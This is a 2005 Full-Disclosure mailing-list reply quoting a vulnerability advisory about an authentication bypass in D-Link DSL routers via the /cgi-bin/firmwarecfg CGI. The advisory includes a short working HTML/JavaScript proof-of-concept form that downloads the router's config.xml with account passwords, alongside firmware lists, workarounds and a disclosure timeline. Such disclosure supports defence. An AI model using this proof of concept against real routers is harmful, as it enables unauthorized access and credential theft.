Re: [Full-disclosure] D-Link DSL routers authentication bypass

From: Sebastian von Knorring (Sebastian.von.Knorring_at_iki.fi)
Date: 05/20/05

  • Next message: Todd Towles: "FW: [Full-disclosure] looking for a HTTPS redirect server" 
    To: Francesco Orro <francesco.orro@akhela.com>
Date: Fri, 20 May 2005 17:05:03 +0300 (EEST)

    Hello.

    Could the D-Link DI-604 story at

    <http://groups-beta.google.com/group/sci.astro.seti/msg/71095063e414a3e2>

    be related to this vulnerability?

    I have myself also a DI-604 that broke down in exactly the same way as described
    above and the above was the only similar case I have yet found on the net.

    My suspicion was also that the box had been hacked and your vulnerability post
    now shows that exploitable holes in D-Link boxes exist.

    -Sebastian

    On Thu, 19 May 2005 16:41:56 +0200 Francesco Orro <francesco.orro@akhela.com> wrote:

    > ====================== SUMMARY ========================
    >
    > Title: D-Link DSL routers authentication bypass
    > Date: 19 May 2005
    > Author: Francesco Orro <francesco.orro 4t akhela.com>
    >
    > Product: DSL-502T, DSL-504T, DSL-562T, DSL-G604T
    > Vendor: D-Link
    > Vendor URL: http://www.dlink.com
    > Vendor Status: D-Link was conctacted
    > Affects: Tested on DSL-502T, DSL-504T, DSL-562T, DSL-G604T with
    > various firmwares versions
    > Risk: High
    > Impact: Unauthorized people may gain full access to the device
    >
    > Vulnerability Description: an undocumented feature allows (in some
    > cases) to bypass the authentication prompt and gain full access to the
    > router, and than to the network behind it.
    >
    >
    > ====================== BACKGROUND ========================
    >
    > D-Link DSL routers are commonly used for internet connectivity for home
    > or small office needs. (http://www.dlink.com/products/)
    >
    >
    > =============== PROBLEM DESCRIPTION ==================
    >
    > The CGI /cgi-bin/firmwarecfg, when executed, checks the existence of
    > the
    > file fw_ip under /var/tmp/. If this file exists, all IP addresses
    > listed
    > inside it are given straight access to the device, without the need for
    > authentication. If this file doesn't exists, the CGI creates a new one,
    > putting the requesting address inside.
    >
    > If the web configuration console is accessible from internet and if
    > nobody have never called the CGI before (es: from a workstation inside
    > the LAN), then everybody can gain access to the router, download the
    > config.xml file which contains users account and passwords, have access
    > to the private network, modify or alter the firmware of the router,
    > etc.
    >
    >
    > ================ ADDITIONAL DETAILS ==================
    >
    > Vulnerability was found on the following firmware versions:
    >
    > V1.00B01T16.EN.20040211
    > V1.00B01T16.EU.20040217
    > V0.00B01T04.UK.20040220
    > V1.00B01T16.EN.20040226
    > V1.00B02T02.EU.20040610
    > V1.00B02T02.UK.20040618
    > V1.00B02T02.EU.20040729
    > V1.00B02T02.DE.20040813
    > V1.00B02T02.RU.20041014
    >
    > Can be exploited by a simple HTTP POST with the form:
    >
    > <html>
    > <head>Download config.xml:<title>GetConfig - Config file
    > download</title></head>
    > <body>
    >
    > <script lang="javascript">
    > function invia_richiesta()
    > {
    > document.DownloadConfig.action='http://'+document.InputBox.Host.
    > value+'/cgi-bin/firmwarecfg';
    > document.DownloadConfig.submit();
    > }
    > </script>
    >
    > <form name="InputBox">
    > <br>http:// Name="Host" type="text" v
    > value="">/cgi-bin/firmwarecfg<br>
    > </form>
    > <form name="DownloadConfig" method="POST" action=""
    > enctype="multipart/form-data">
    > <input type="Submit" name="config" value="Download"
    > onClick="javascript:invia_richiesta();"><br>
    > </form>
    >
    > </body>
    > </html>
    >
    >
    > =================== FIX INFORMATION ===================
    >
    > Actually there is no solution to problem due to the fact that it seems
    > an hidden feature.
    > The work around is to call the CGI /cgi-bin/firmwarecfg from a known
    > address of the local network and/or disable web console access from the
    > internet.
    >
    >
    > ================ AUTHOR INFORMATION ================
    >
    > Francesco Orro
    > Akhela S.r.l. - Operation Group
    >     http://www.akhela.com/
    >
    > EMail: francesco.orro 4t akhela.com
    > KeyID: 6CF46D45
    >
    >
    > =================== DISCLOSURE HISTORY =====================
    >
    > 2 May 2005 - First private release of this advisory;
    > 4 May 2005 - The vendor (D-Link Mediterraneo S.r.l.) has been informed
    > of the vulnerability;
    > 5 May 2005 - The vendor replid that the problem was resolved on
    > firmware version V1.00B02T02.EU.20040610, but has been
    > demostrated that this version is vulnerable too;
    > 19 May 2005 - Public release of this advisory.
    >
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/

  • Next message: Todd Towles: "FW: [Full-disclosure] looking for a HTTPS redirect server"